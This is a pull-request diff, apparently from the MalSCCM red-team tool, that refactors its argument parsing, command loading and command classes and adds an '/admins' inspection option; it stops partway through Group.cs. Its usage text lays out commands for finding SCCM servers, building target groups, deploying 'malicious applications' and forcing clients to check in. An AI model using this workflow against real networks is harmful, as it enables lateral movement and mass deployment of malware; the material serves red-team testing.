### PR TITLE
Add FbGetSCCMAdmins (plus other refactors)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -5,4 +5,4 @@
 [Bb]in/
 [Oo]bj/
 .DS_Store
-
+*.idea

--- a/MalSCCM/Args/ArgumentParser.cs
+++ b/MalSCCM/Args/ArgumentParser.cs
@@ -1,43 +1,42 @@
 ﻿using System.Collections.Generic;
 using System.Diagnostics;
 
-namespace MalSCCM.Args
+namespace MalSCCM.Args;
+
+public static class ArgumentParser
 {
-    public static class ArgumentParser
+    public static ArgumentParserResult Parse(IEnumerable<string> args)
     {
-        public static ArgumentParserResult Parse(IEnumerable<string> args)
+        var arguments = new Dictionary<string, string>();
+        try
         {
-            var arguments = new Dictionary<string, string>();
-            try
+            foreach (var argument in args)
             {
-                foreach (var argument in args)
+                var idx = argument.IndexOf(':');
+                if (idx > 0)
                 {
-                    var idx = argument.IndexOf(':');
+                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
+                }
+                else
+                {
+                    idx = argument.IndexOf('=');
                     if (idx > 0)
                     {
                         arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
                     }
                     else
                     {
-                        idx = argument.IndexOf('=');
-                        if (idx > 0)
-                        {
-                            arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
-                        }
-                        else
-                        {
-                            arguments[argument] = string.Empty;
-                        }
+                        arguments[argument] = string.Empty;
                     }
                 }
+            }
 
-                return ArgumentParserResult.Success(arguments);
-            }
-            catch (System.Exception ex)
-            {
-                Debug.WriteLine(ex.Message);
-                return ArgumentParserResult.Failure();
-            }
+            return ArgumentParserResult.Success(arguments);
+        }
+        catch (System.Exception ex)
+        {
+            Debug.WriteLine(ex.Message);
+            return ArgumentParserResult.Failure();
         }
     }
 }

--- a/MalSCCM/Args/ArgumentParserResult.cs
+++ b/MalSCCM/Args/ArgumentParserResult.cs
@@ -1,23 +1,22 @@
 ﻿using System.Collections.Generic;
 
-namespace MalSCCM.Args
+namespace MalSCCM.Args;
+
+public class ArgumentParserResult
 {
-    public class ArgumentParserResult
+    public bool ParsedOk { get; }
+    public Dictionary<string, string> Arguments { get; }
+
+    private ArgumentParserResult(bool parsedOk, Dictionary<string, string> arguments)
     {
-        public bool ParsedOk { get; }
-        public Dictionary<string, string> Arguments { get; }
-
-        private ArgumentParserResult(bool parsedOk, Dictionary<string, string> arguments)
-        {
-            ParsedOk = parsedOk;
-            Arguments = arguments;
-        }
-
-        public static ArgumentParserResult Success(Dictionary<string, string> arguments)
-            => new ArgumentParserResult(true, arguments);
-
-        public static ArgumentParserResult Failure()
-            => new ArgumentParserResult(false, null);
-
+        ParsedOk = parsedOk;
+        Arguments = arguments;
     }
+
+    public static ArgumentParserResult Success(Dictionary<string, string> arguments)
+        => new ArgumentParserResult(true, arguments);
+
+    public static ArgumentParserResult Failure()
+        => new ArgumentParserResult(false, null);
+
 }

--- a/MalSCCM/Args/CommandCollection.cs
+++ b/MalSCCM/Args/CommandCollection.cs
@@ -2,47 +2,46 @@
 using System.Collections.Generic;
 using MalSCCM.Commands;
 
-namespace MalSCCM.Args
+namespace MalSCCM.Args;
+
+public class CommandCollection
 {
-    public class CommandCollection
+    private readonly Dictionary<string, Func<ICommand>> _availableCommands = new Dictionary<string, Func<ICommand>>();
+
+    // How To Add A New Command:
+    //  1. Create your command class in the Commands Folder
+    //      a. That class must have a CommandName static property that has the Command's name
+    //              and must also Implement the ICommand interface
+    //      b. Put the code that does the work into the Execute() method
+    //  2. Add an entry to the _availableCommands dictionary in the Constructor below.
+
+    public CommandCollection()
     {
-        private readonly Dictionary<string, Func<ICommand>> _availableCommands = new Dictionary<string, Func<ICommand>>();
+        _availableCommands.Add(Inspect.CommandName, () => new Inspect());
+        _availableCommands.Add(Group.CommandName, () => new Group());
+        _availableCommands.Add(App.CommandName, () => new App());
+        _availableCommands.Add(Checkin.CommandName, () => new Checkin());
+        _availableCommands.Add(Locate.CommandName, () => new Locate());
 
-        // How To Add A New Command:
-        //  1. Create your command class in the Commands Folder
-        //      a. That class must have a CommandName static property that has the Command's name
-        //              and must also Implement the ICommand interface
-        //      b. Put the code that does the work into the Execute() method
-        //  2. Add an entry to the _availableCommands dictionary in the Constructor below.
+    }
 
-        public CommandCollection()
+    public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
+    {
+        bool commandWasFound;
+
+        if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false)
+            commandWasFound= false;
+        else
         {
-            _availableCommands.Add(Inspect.CommandName, () => new Inspect());
-            _availableCommands.Add(Group.CommandName, () => new Group());
-            _availableCommands.Add(App.CommandName, () => new App());
-            _availableCommands.Add(Checkin.CommandName, () => new Checkin());
-            _availableCommands.Add(Locate.CommandName, () => new Locate());
-
-        }
-
-        public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
-        {
-            bool commandWasFound;
-
-            if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false)
-                commandWasFound= false;
-            else
-            {
-                // Create the command object 
-                var command = _availableCommands[commandName].Invoke();
+            // Create the command object 
+            var command = _availableCommands[commandName].Invoke();
                 
-                // and execute it with the arguments from the command line
-                command.Execute(arguments);
+            // and execute it with the arguments from the command line
+            command.Execute(arguments);
 
-                commandWasFound = true;
-            }
-
-            return commandWasFound;
+            commandWasFound = true;
         }
+
+        return commandWasFound;
     }
 }

--- a/MalSCCM/Args/CommandCollection.cs
+++ b/MalSCCM/Args/CommandCollection.cs
@@ -1,47 +1,52 @@
 ﻿using System;
 using System.Collections.Generic;
+using System.Linq;
+
 using MalSCCM.Commands;
 
 namespace MalSCCM.Args;
 
 public class CommandCollection
 {
-    private readonly Dictionary<string, Func<ICommand>> _availableCommands = new Dictionary<string, Func<ICommand>>();
+    private readonly List<ICommand> _availableCommands = new();
 
     // How To Add A New Command:
-    //  1. Create your command class in the Commands Folder
-    //      a. That class must have a CommandName static property that has the Command's name
-    //              and must also Implement the ICommand interface
-    //      b. Put the code that does the work into the Execute() method
-    //  2. Add an entry to the _availableCommands dictionary in the Constructor below.
+    //  - Create your command class in the Commands Folder
+    //    - That class must implement the ICommand interface
+    //    - Give the command a name
+    //    - Put the code that does the work into the Execute() method
 
     public CommandCollection()
     {
-        _availableCommands.Add(Inspect.CommandName, () => new Inspect());
-        _availableCommands.Add(Group.CommandName, () => new Group());
-        _availableCommands.Add(App.CommandName, () => new App());
-        _availableCommands.Add(Checkin.CommandName, () => new Checkin());
-        _availableCommands.Add(Locate.CommandName, () => new Locate());
-
+        // instantiate each command dynamically
+        
+        var self = typeof(CommandCollection).Assembly;
+        
+        // loop through each type
+        foreach (var type in self.GetTypes())
+        {
+            // ignore if they don't implement ICommand or if it's the interface itself
+            if (!typeof(ICommand).IsAssignableFrom(type) || type.Name.Equals("ICommand"))
+                continue;
+            
+            // instantiate a new instance
+            var command = (ICommand)Activator.CreateInstance(type);
+            _availableCommands.Add(command);
+        }
     }
 
     public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
     {
-        bool commandWasFound;
+        // find the correct command, case-insensitive 
+        var command = _availableCommands.FirstOrDefault(c =>
+            c.CommandName.Equals(commandName, StringComparison.OrdinalIgnoreCase));
 
-        if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false)
-            commandWasFound= false;
-        else
-        {
-            // Create the command object 
-            var command = _availableCommands[commandName].Invoke();
-                
-            // and execute it with the arguments from the command line
-            command.Execute(arguments);
-
-            commandWasFound = true;
-        }
-
-        return commandWasFound;
+        // return false if command is null (i.e. not found)
+        if (command is null)
+            return false;
+        
+        // otherwise execute and return true
+        command.Execute(arguments);
+        return true;
     }
 }

--- a/MalSCCM/Args/Info.cs
+++ b/MalSCCM/Args/Info.cs
@@ -28,7 +28,7 @@ public static class Info
                                  MalSCCM.exe locate
 
                              Inspect the primary server to gather SCCM information:
-                                 MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
+                                 MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers /admins>
 
                              Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
                                  MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>

--- a/MalSCCM/Args/Info.cs
+++ b/MalSCCM/Args/Info.cs
@@ -1,24 +1,24 @@
 ﻿using System;
 
-namespace MalSCCM.Args
+namespace MalSCCM.Args;
+
+public static class Info
 {
-    public static class Info
+    public static void ShowLogo()
     {
-        public static void ShowLogo()
-        {
-            string logo = @" __  __       _ ____   ____ ____ __  __
+        string logo = @" __  __       _ ____   ____ ____ __  __
 |  \/  | __ _| / ___| / ___/ ___|  \/  |
 | |\/| |/ _` | \___ \| |  | |   | |\/| |
 | |  | | (_| | |___) | |__| |___| |  | |
 |_|  |_|\__,_|_|____/ \____\____|_|  |_|
     Phil Keeble @ Nettitude Red Team
 ";
-            Console.WriteLine(logo);
-        }
+        Console.WriteLine(logo);
+    }
 
-        public static void ShowUsage()
-        {
-            string usage = @"Commands listed below have optional parameters in <>. 
+    public static void ShowUsage()
+    {
+        string usage = @"Commands listed below have optional parameters in <>. 
 
 Attempt to find the SCCM management and primary servers:
     MalSCCM.exe locate
@@ -42,7 +42,6 @@ Create/Deploy/Delete malicious applications:
 Force devices of a group to checkin within a couple minutes:
     MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
 ";
-            Console.WriteLine(usage);
-        }
+        Console.WriteLine(usage);
     }
 }

--- a/MalSCCM/Args/Info.cs
+++ b/MalSCCM/Args/Info.cs
@@ -6,42 +6,48 @@ public static class Info
 {
     public static void ShowLogo()
     {
-        string logo = @" __  __       _ ____   ____ ____ __  __
-|  \/  | __ _| / ___| / ___/ ___|  \/  |
-| |\/| |/ _` | \___ \| |  | |   | |\/| |
-| |  | | (_| | |___) | |__| |___| |  | |
-|_|  |_|\__,_|_|____/ \____\____|_|  |_|
-    Phil Keeble @ Nettitude Red Team
-";
+        const string logo = """
+                             __  __       _ ____   ____ ____ __  __
+                            |  \/  | __ _| / ___| / ___/ ___|  \/  |
+                            | |\/| |/ _` | \___ \| |  | |   | |\/| |
+                            | |  | | (_| | |___) | |__| |___| |  | |
+                            |_|  |_|\__,_|_|____/ \____\____|_|  |_|
+                                Phil Keeble @ Nettitude Red Team
+
+                            """;
+        
         Console.WriteLine(logo);
     }
 
     public static void ShowUsage()
     {
-        string usage = @"Commands listed below have optional parameters in <>. 
+        const string usage = """
+                             Commands listed below have optional parameters in <>.
 
-Attempt to find the SCCM management and primary servers:
-    MalSCCM.exe locate
+                             Attempt to find the SCCM management and primary servers:
+                                 MalSCCM.exe locate
 
-Inspect the primary server to gather SCCM information:
-    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
+                             Inspect the primary server to gather SCCM information:
+                                 MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
 
-Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
-    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
-    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
-    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
-    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
+                             Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
+                                 MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
+                                 MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
+                                 MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
+                                 MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
 
-Create/Deploy/Delete malicious applications:
-    MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
-    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
-    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
-    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
-    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
+                             Create/Deploy/Delete malicious applications:
+                                 MalSCCM.exe app /create /name:appname /uncpath:"\\unc\path" </server:PrimarySiteHostname>
+                                 MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
+                                 MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
+                                 MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
+                                 MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
 
-Force devices of a group to checkin within a couple minutes:
-    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
-";
+                             Force devices of a group to checkin within a couple minutes:
+                                 MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
+
+                             """;
+        
         Console.WriteLine(usage);
     }
 }

--- a/MalSCCM/Commands/App.cs
+++ b/MalSCCM/Commands/App.cs
@@ -6,7 +6,8 @@ namespace MalSCCM.Commands;
 public class App : ICommand
 {
 
-    public static string CommandName => "app";
+    public string CommandName => "app";
+    
     public static string AppName = "";
     public static string UNCPath = "";
     public static string AssignmentName = "";

--- a/MalSCCM/Commands/App.cs
+++ b/MalSCCM/Commands/App.cs
@@ -5,41 +5,39 @@ namespace MalSCCM.Commands;
 
 public class App : ICommand
 {
-
     public string CommandName => "app";
     
     public static string AppName = "";
     public static string UNCPath = "";
     public static string AssignmentName = "";
 
-
     public void Execute(Dictionary<string, string> arguments)
     {
-        if (arguments.ContainsKey("/server"))
+        if (arguments.TryGetValue("/server", out var argument))
         {
-            Inspect.ServerName = arguments["/server"];
+            Inspect.ServerName = argument;
         }
 
         Console.WriteLine("[*] Action: Manipulating SCCM Applications");
 
-        if (arguments.ContainsKey("/groupname"))
+        if (arguments.TryGetValue("/groupname", out var argument1))
         {
-            Group.GroupName = arguments["/groupname"];
+            Group.GroupName = argument1;
         }
 
-        if (arguments.ContainsKey("/name"))
+        if (arguments.TryGetValue("/name", out var argument2))
         {
-            AppName = arguments["/name"];
+            AppName = argument2;
         }
 
-        if (arguments.ContainsKey("/uncpath"))
+        if (arguments.TryGetValue("/uncpath", out var argument3))
         {
-            UNCPath = arguments["/uncpath"];
+            UNCPath = argument3;
         }
 
-        if (arguments.ContainsKey("/assignmentname"))
+        if (arguments.TryGetValue("/assignmentname", out var argument4))
         {
-            AssignmentName = arguments["/assignmentname"];
+            AssignmentName = argument4;
         }
 
         if (!Enum.FbGetSiteScope())
@@ -85,7 +83,6 @@ public class App : ICommand
             Console.WriteLine("[*] Action: Deleting SCCM Application");
             Application.FbRemoveSCCMApplication();
         }
-
 
         Console.WriteLine("\r\n[*] App complete\r\n");
     }

--- a/MalSCCM/Commands/App.cs
+++ b/MalSCCM/Commands/App.cs
@@ -1,92 +1,91 @@
 ﻿using System;
 using System.Collections.Generic;
 
-namespace MalSCCM.Commands
+namespace MalSCCM.Commands;
+
+public class App : ICommand
 {
-    public class App : ICommand
+
+    public static string CommandName => "app";
+    public static string AppName = "";
+    public static string UNCPath = "";
+    public static string AssignmentName = "";
+
+
+    public void Execute(Dictionary<string, string> arguments)
     {
-
-        public static string CommandName => "app";
-        public static string AppName = "";
-        public static string UNCPath = "";
-        public static string AssignmentName = "";
-
-
-        public void Execute(Dictionary<string, string> arguments)
+        if (arguments.ContainsKey("/server"))
         {
-            if (arguments.ContainsKey("/server"))
-            {
-                Inspect.ServerName = arguments["/server"];
-            }
-
-            Console.WriteLine("[*] Action: Manipulating SCCM Applications");
-
-            if (arguments.ContainsKey("/groupname"))
-            {
-                Group.GroupName = arguments["/groupname"];
-            }
-
-            if (arguments.ContainsKey("/name"))
-            {
-                AppName = arguments["/name"];
-            }
-
-            if (arguments.ContainsKey("/uncpath"))
-            {
-                UNCPath = arguments["/uncpath"];
-            }
-
-            if (arguments.ContainsKey("/assignmentname"))
-            {
-                AssignmentName = arguments["/assignmentname"];
-            }
-
-            if (!Enum.FbGetSiteScope())
-            {
-                Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
-                if (!Enum.FbGetSiteScope2())
-                {
-                    Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
-                    Enum.FbGetSiteScope3();
-                }
-            }
-
-            if (arguments.ContainsKey("/create"))
-            {
-                Console.WriteLine("[*] Action: Creating SCCM Application");
-                Application.FbCreateSCCMApplication();
-            }
-
-            if (arguments.ContainsKey("/delete"))
-            {
-                Console.WriteLine("[*] Action: Deleting SCCM Application");
-                Application.FbRemoveSCCMApplication();
-            }
-
-            if (arguments.ContainsKey("/deploy"))
-            {
-                Console.WriteLine("[*] Action: Gathering group ID");
-                Groups.FbGetSCCMCollectionID();
-                Console.WriteLine("[*] Action: Deploying SCCM Application");
-                Application.FbDeploySCCMApplication();
-            }
-
-            if (arguments.ContainsKey("/deletedeploy"))
-            {
-                Console.WriteLine("[*] Action: Removing SCCM Application Deployment");
-                Application.FbRemoveSCCMApplicationDeployment();
-            }
-
-            if (arguments.ContainsKey("/cleanup"))
-            {
-                Console.WriteLine("[*] Action: Removing SCCM Application Deployment");
-                Application.FbRemoveSCCMApplicationDeployment();
-                Console.WriteLine("[*] Action: Deleting SCCM Application");
-                Application.FbRemoveSCCMApplication();
-            }
-
-
-            Console.WriteLine("\r\n[*] App complete\r\n");
+            Inspect.ServerName = arguments["/server"];
         }
+
+        Console.WriteLine("[*] Action: Manipulating SCCM Applications");
+
+        if (arguments.ContainsKey("/groupname"))
+        {
+            Group.GroupName = arguments["/groupname"];
+        }
+
+        if (arguments.ContainsKey("/name"))
+        {
+            AppName = arguments["/name"];
+        }
+
+        if (arguments.ContainsKey("/uncpath"))
+        {
+            UNCPath = arguments["/uncpath"];
+        }
+
+        if (arguments.ContainsKey("/assignmentname"))
+        {
+            AssignmentName = arguments["/assignmentname"];
+        }
+
+        if (!Enum.FbGetSiteScope())
+        {
+            Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
+            if (!Enum.FbGetSiteScope2())
+            {
+                Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
+                Enum.FbGetSiteScope3();
+            }
+        }
+
+        if (arguments.ContainsKey("/create"))
+        {
+            Console.WriteLine("[*] Action: Creating SCCM Application");
+            Application.FbCreateSCCMApplication();
+        }
+
+        if (arguments.ContainsKey("/delete"))
+        {
+            Console.WriteLine("[*] Action: Deleting SCCM Application");
+            Application.FbRemoveSCCMApplication();
+        }
+
+        if (arguments.ContainsKey("/deploy"))
+        {
+            Console.WriteLine("[*] Action: Gathering group ID");
+            Groups.FbGetSCCMCollectionID();
+            Console.WriteLine("[*] Action: Deploying SCCM Application");
+            Application.FbDeploySCCMApplication();
+        }
+
+        if (arguments.ContainsKey("/deletedeploy"))
+        {
+            Console.WriteLine("[*] Action: Removing SCCM Application Deployment");
+            Application.FbRemoveSCCMApplicationDeployment();
+        }
+
+        if (arguments.ContainsKey("/cleanup"))
+        {
+            Console.WriteLine("[*] Action: Removing SCCM Application Deployment");
+            Application.FbRemoveSCCMApplicationDeployment();
+            Console.WriteLine("[*] Action: Deleting SCCM Application");
+            Application.FbRemoveSCCMApplication();
+        }
+
+
+        Console.WriteLine("\r\n[*] App complete\r\n");
     }
 }

--- a/MalSCCM/Commands/Checkin.cs
+++ b/MalSCCM/Commands/Checkin.cs
@@ -5,9 +5,7 @@ namespace MalSCCM.Commands;
 
 public class Checkin : ICommand
 {
-
-    public static string CommandName => "checkin";
-
+    public string CommandName => "checkin";
 
     public void Execute(Dictionary<string, string> arguments)
     {

--- a/MalSCCM/Commands/Checkin.cs
+++ b/MalSCCM/Commands/Checkin.cs
@@ -1,46 +1,45 @@
 ﻿using System;
 using System.Collections.Generic;
 
-namespace MalSCCM.Commands
+namespace MalSCCM.Commands;
+
+public class Checkin : ICommand
 {
-    public class Checkin : ICommand
+
+    public static string CommandName => "checkin";
+
+
+    public void Execute(Dictionary<string, string> arguments)
     {
-
-        public static string CommandName => "checkin";
-
-
-        public void Execute(Dictionary<string, string> arguments)
+        if (arguments.ContainsKey("/server"))
         {
-            if (arguments.ContainsKey("/server"))
-            {
-                Inspect.ServerName = arguments["/server"];
-            }
-
-            Console.WriteLine("[*] Action: Causing SCCM poll");
-
-            if (arguments.ContainsKey("/groupname"))
-            {
-                Group.GroupName = arguments["/groupname"];
-            }
-
-            if (!Enum.FbGetSiteScope())
-            {
-                Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
-                if (!Enum.FbGetSiteScope2())
-                {
-                    Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
-                    Enum.FbGetSiteScope3();
-                }
-            }
-
-            if (arguments.ContainsKey("/groupname"))
-            {
-                Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
-                Groups.FbGetSCCMCollectionID();
-                Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates");
-                Check.FbSCCMDeviceCheckin();
-            }
-            Console.WriteLine("\r\n[*] Checkin complete\r\n");
+            Inspect.ServerName = arguments["/server"];
         }
+
+        Console.WriteLine("[*] Action: Causing SCCM poll");
+
+        if (arguments.ContainsKey("/groupname"))
+        {
+            Group.GroupName = arguments["/groupname"];
+        }
+
+        if (!Enum.FbGetSiteScope())
+        {
+            Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
+            if (!Enum.FbGetSiteScope2())
+            {
+                Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
+                Enum.FbGetSiteScope3();
+            }
+        }
+
+        if (arguments.ContainsKey("/groupname"))
+        {
+            Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
+            Groups.FbGetSCCMCollectionID();
+            Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates");
+            Check.FbSCCMDeviceCheckin();
+        }
+        Console.WriteLine("\r\n[*] Checkin complete\r\n");
     }
 }

--- a/MalSCCM/Commands/Checkin.cs
+++ b/MalSCCM/Commands/Checkin.cs
@@ -9,16 +9,16 @@ public class Checkin : ICommand
 
     public void Execute(Dictionary<string, string> arguments)
     {
-        if (arguments.ContainsKey("/server"))
+        if (arguments.TryGetValue("/server", out var argument))
         {
-            Inspect.ServerName = arguments["/server"];
+            Inspect.ServerName = argument;
         }
 
         Console.WriteLine("[*] Action: Causing SCCM poll");
 
-        if (arguments.ContainsKey("/groupname"))
+        if (arguments.TryGetValue("/groupname", out var argument1))
         {
-            Group.GroupName = arguments["/groupname"];
+            Group.GroupName = argument1;
         }
 
         if (!Enum.FbGetSiteScope())
@@ -38,6 +38,7 @@ public class Checkin : ICommand
             Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates");
             Check.FbSCCMDeviceCheckin();
         }
+        
         Console.WriteLine("\r\n[*] Checkin complete\r\n");
     }
 }

--- a/MalSCCM/Commands/Group.cs
+++ b/MalSCCM/Commands/Group.cs
@@ -1,99 +1,98 @@
 ﻿using System;
 using System.Collections.Generic;
 
-namespace MalSCCM.Commands
+namespace MalSCCM.Commands;
+
+public class Group : ICommand
 {
-    public class Group : ICommand
+
+    public static string CommandName => "group";
+    public static string GroupName = "";
+    public static string GroupType = "";
+    public static string SystemCollectionID = "";
+    public static string UserCollectionID = "";
+    public static string TargetCollectionID = "";
+    public static string UserName = "";
+    public static string DeviceName = "";
+    public static string ResourceID = "";
+
+
+    public void Execute(Dictionary<string, string> arguments)
     {
-
-        public static string CommandName => "group";
-        public static string GroupName = "";
-        public static string GroupType = "";
-        public static string SystemCollectionID = "";
-        public static string UserCollectionID = "";
-        public static string TargetCollectionID = "";
-        public static string UserName = "";
-        public static string DeviceName = "";
-        public static string ResourceID = "";
-
-
-        public void Execute(Dictionary<string, string> arguments)
+        if (arguments.ContainsKey("/server"))
         {
-            if (arguments.ContainsKey("/server"))
-            {
-                Inspect.ServerName = arguments["/server"];
-            }
-
-            Console.WriteLine("[*] Action: Manipulating SCCM Groups");
-
-            if (arguments.ContainsKey("/groupname"))
-            {
-                GroupName = arguments["/groupname"];
-            }
-
-            if (arguments.ContainsKey("/grouptype"))
-            {
-                GroupType = arguments["/grouptype"];
-            }
-
-            if (arguments.ContainsKey("/user"))
-            {
-                UserName = arguments["/user"];
-            }
-
-            if (arguments.ContainsKey("/host"))
-            {
-                DeviceName = arguments["/host"];
-            }
-
-            if (!Enum.FbGetSiteScope())
-            {
-                Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
-                if (!Enum.FbGetSiteScope2())
-                {
-                    Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
-                    Enum.FbGetSiteScope3();
-                }
-            }
-
-            if (arguments.ContainsKey("/create"))
-            {
-                Console.WriteLine("[*] Action: Creating SCCM Group");
-                Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
-                Groups.FbGetSCCMCollectionID();
-                Console.WriteLine("\r\n[*] Action: Creating Collection");
-                Groups.FbNewSCCMCollection();
-            }
-
-            if (arguments.ContainsKey("/delete"))
-            {
-                Console.WriteLine("[*] Action: Deleting SCCM Group");
-                Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
-                Groups.FbGetSCCMCollectionID();
-                Console.WriteLine("\r\n[*] Action: Removing Collection");
-                Groups.FbRemoveSCCMCollection();
-            }
-
-            if (arguments.ContainsKey("/adduser"))
-            {
-                Console.WriteLine("[*] Action: Adding User to an SCCM Group");
-                Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
-                Groups.FbGetSCCMCollectionID();
-                Console.WriteLine("\r\n[*] Action: Adding User");
-                Groups.FbAddUserToSCCMCollection();
-            }
-
-            if (arguments.ContainsKey("/addhost"))
-            {
-                Console.WriteLine("[*] Action: Adding System to an SCCM Group");
-                Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
-                Groups.FbGetSCCMCollectionID();
-                Console.WriteLine("\r\n[*] Action: Adding Device");
-                Groups.FbAddDeviceToSCCMCollection();
-            }
-
-
-            Console.WriteLine("\r\n[*] Group complete\r\n");
+            Inspect.ServerName = arguments["/server"];
         }
+
+        Console.WriteLine("[*] Action: Manipulating SCCM Groups");
+
+        if (arguments.ContainsKey("/groupname"))
+        {
+            GroupName = arguments["/groupname"];
+        }
+
+        if (arguments.ContainsKey("/grouptype"))
+        {
+            GroupType = arguments["/grouptype"];
+        }
+
+        if (arguments.ContainsKey("/user"))
+        {
+            UserName = arguments["/user"];
+        }
+
+        if (arguments.ContainsKey("/host"))
+        {
+            DeviceName = arguments["/host"];
+        }
+
+        if (!Enum.FbGetSiteScope())
+        {
+            Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
+            if (!Enum.FbGetSiteScope2())
+            {
+                Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
+                Enum.FbGetSiteScope3();
+            }
+        }
+
+        if (arguments.ContainsKey("/create"))
+        {
+            Console.WriteLine("[*] Action: Creating SCCM Group");
+            Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
+            Groups.FbGetSCCMCollectionID();
+            Console.WriteLine("\r\n[*] Action: Creating Collection");
+            Groups.FbNewSCCMCollection();
+        }
+
+        if (arguments.ContainsKey("/delete"))
+        {
+            Console.WriteLine("[*] Action: Deleting SCCM Group");
+            Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
+            Groups.FbGetSCCMCollectionID();
+            Console.WriteLine("\r\n[*] Action: Removing Collection");
+            Groups.FbRemoveSCCMCollection();
+        }
+
+        if (arguments.ContainsKey("/adduser"))
+        {
+            Console.WriteLine("[*] Action: Adding User to an SCCM Group");
+            Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
+            Groups.FbGetSCCMCollectionID();
+            Console.WriteLine("\r\n[*] Action: Adding User");
+            Groups.FbAddUserToSCCMCollection();
+        }
+
+        if (arguments.ContainsKey("/addhost"))
+        {
+            Console.WriteLine("[*] Action: Adding System to an SCCM Group");
+            Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
+            Groups.FbGetSCCMCollectionID();
+            Console.WriteLine("\r\n[*] Action: Adding Device");
+            Groups.FbAddDeviceToSCCMCollection();
+        }
+
+
+        Console.WriteLine("\r\n[*] Group complete\r\n");
     }
 }

--- a/MalSCCM/Commands/Group.cs
+++ b/MalSCCM/Commands/Group.cs
@@ -5,8 +5,8 @@ namespace MalSCCM.Commands;
 
 public class Group : ICommand
 {
-
-    public static string CommandName => "group";
+    public string CommandName => "group";
+    
     public static string GroupName = "";
     public static string GroupType = "";
     public static string SystemCollectionID = "";
@@ -15,7 +15,6 @@ public class Group : ICommand
     public static string UserName = "";
     public static string DeviceName = "";
     public static string ResourceID = "";
-
 
     public void Execute(Dictionary<string, string> arguments)
     {

--- a/MalSCCM/Commands/Group.cs
+++ b/MalSCCM/Commands/Group.cs
@@ -18,31 +18,31 @@ public class Group : ICommand
 
     public void Execute(Dictionary<string, string> arguments)
     {
-        if (arguments.ContainsKey("/server"))
+        if (arguments.TryGetValue("/server", out var argument))
         {
-            Inspect.ServerName = arguments["/server"];
+            Inspect.ServerName = argument;
         }
 
         Console.WriteLine("[*] Action: Manipulating SCCM Groups");
 
-        if (arguments.ContainsKey("/groupname"))
+        if (arguments.TryGetValue("/groupname", out var argument1))
         {
-            GroupName = arguments["/groupname"];
+            GroupName = argument1;
         }
 
-        if (arguments.ContainsKey("/grouptype"))
+        if (arguments.TryGetValue("/grouptype", out var argument2))
         {
-            GroupType = arguments["/grouptype"];
+            GroupType = argument2;
         }
 
-        if (arguments.ContainsKey("/user"))
